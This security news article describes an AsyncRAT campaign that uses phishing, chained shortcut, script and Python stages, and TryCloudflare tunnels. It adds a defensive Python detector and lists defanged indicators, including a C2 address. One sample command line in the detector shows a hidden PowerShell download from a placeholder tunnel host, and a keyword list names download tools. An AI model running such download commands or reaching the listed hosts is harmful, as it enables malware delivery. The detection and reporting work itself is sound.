
A recent cybersecurity threat has emerged in the form of AsyncRAT, a remote access trojan (RAT) that leverages Python and TryCloudflare for stealthy malware delivery.
This sophisticated campaign involves a complex sequence of events, starting with phishing emails that deceive users into downloading malicious payloads.
The attack chain abuses legitimate infrastructure, which makes detection challenging and poses significant risks to organizations.
The Forcepoint X-Labs research team has detailed this evolving threat, noting that the threat actors relied on legitimate infrastructure to remain undetected.
Phishing Email and Initial Payload
The attack begins with a phishing email containing a Dropbox URL. When clicked, this link downloads a ZIP file, which includes an internet shortcut file (.URL format).
Opening this file initiates a series of background downloads while displaying a legitimate-looking PDF to distract the user.

AsyncRAT Attack Chain (Source – ForcePoint)
Stage 1: .URL Analysis
The .URL file contains a TryCloudflare URL, which directs to a directory hosting an .LNK file.

Internet Shortcut File (Source – ForcePoint)
This link leads to a directory with an .LNK file named “RE-002.pdf.1nk.”
Stage 2: .LNK Analysis
Clicking the .LNK file triggers PowerShell to download a JavaScript file from the same TryCloudflare tunnel.

Stage 3: .JS Analysis
The JavaScript file downloads a .BAT file from the same TryCloudflare site.

Stage 4: .BAT Analysis
The .BAT file uses PowerShell to download a ZIP file containing a Python package. It extracts the ZIP, checks for Python, and runs the Python scripts.

Deobfuscated .BAT File (Source – ForcePoint)
Stage 5: .PY Analysis
The Python package includes a load.py file that executes malicious .BIN files. It uses the ctypes library to interact with Windows APIs.

Actual Malicious Files (Source – ForcePoint)
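As an added defensive example (not code from the article or from Forcepoint), the script below checks two artifacts from the chain described above: the Stage 1 Internet Shortcut (.URL) whose target is a TryCloudflare tunnel URL ending in a lookalike extension such as "RE-002.pdf.1nk", and a Stage 2/4 style process command line in which PowerShell downloads from the same kind of tunnel. The tunnel host name and the log lines are constructed placeholders, not the indicators reported in the article.

```python
import configparser
import re
from typing import List

# Constructed .URL (InternetShortcut) body modelled on Stage 1; the tunnel host is a placeholder.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=https://example-tunnel-placeholder.trycloudflare.com/DE/RE-002.pdf.1nk
IconIndex=0
"""

# Constructed process-creation command lines: one modelled on the PowerShell download
# stage, one benign administrative command for comparison.
SAMPLE_CMDLINES = [
    'powershell.exe -w hidden -c "iwr https://example-tunnel-placeholder.trycloudflare.com/DE/x.js -o $env:TEMP\\x.js"',
    'powershell.exe -Command Get-ChildItem C:\\Users',
]

# Any host under trycloudflare.com is an ad hoc tunnel, not a named, owned domain.
TUNNEL_RE = re.compile(r"https?://[a-z0-9-]+\.trycloudflare\.com/", re.I)
# Document-looking name followed by an executable or lookalike extension (e.g. ".pdf.1nk").
LOOKALIKE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.(1nk|lnk|url|js|bat)$", re.I)
DOWNLOAD_VERBS = ("iwr", "invoke-webrequest", "curl", "wget", "downloadfile", "downloadstring")


def analyze_url_shortcut(text: str) -> List[str]:
    """Return detection labels for the body of a Windows .URL shortcut file."""
    findings: List[str] = []
    cp = configparser.ConfigParser(interpolation=None)  # .URL files are INI-formatted
    cp.read_string(text)
    target = cp.get("InternetShortcut", "URL", fallback="")
    if TUNNEL_RE.match(target):
        findings.append("url-target-trycloudflare-tunnel")
    if LOOKALIKE_EXT_RE.search(target):
        findings.append("url-target-lookalike-extension")
    return findings


def analyze_cmdline(cmd: str) -> List[str]:
    """Return detection labels for a process command line from an EDR or Sysmon event."""
    low = cmd.lower()
    findings: List[str] = []
    if "powershell" in low and any(v in low for v in DOWNLOAD_VERBS) and TUNNEL_RE.search(cmd):
        findings.append("powershell-download-from-trycloudflare")
    if "-w hidden" in low or "-windowstyle hidden" in low:
        findings.append("powershell-hidden-window")
    return findings


if __name__ == "__main__":
    print(analyze_url_shortcut(SAMPLE_URL_FILE))
    for line in SAMPLE_CMDLINES:
        print(line[:40], "->", analyze_cmdline(line))
```

The same two checks can be applied to .LNK target paths and to proxy logs, since every stage of the chain fetched its next payload from a TryCloudflare host.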
By using multi-stage obfuscation and legitimate-looking distractions, the attackers evade detection while deploying AsyncRAT and other malware.
Organizations must remain vigilant and adopt robust security measures to detect and block such threats at various stages of the attack chain.
Indicators of Compromise (IOCs)
- Malicious URLs:
  - hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/
  - hxxps[:]//mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip
- C2 Servers:
  - 62.60.190.141:3232
- Hashes:
  - ZIP File: 55724b766dd1fe8bf9dd4cb7094b83b88d57d945
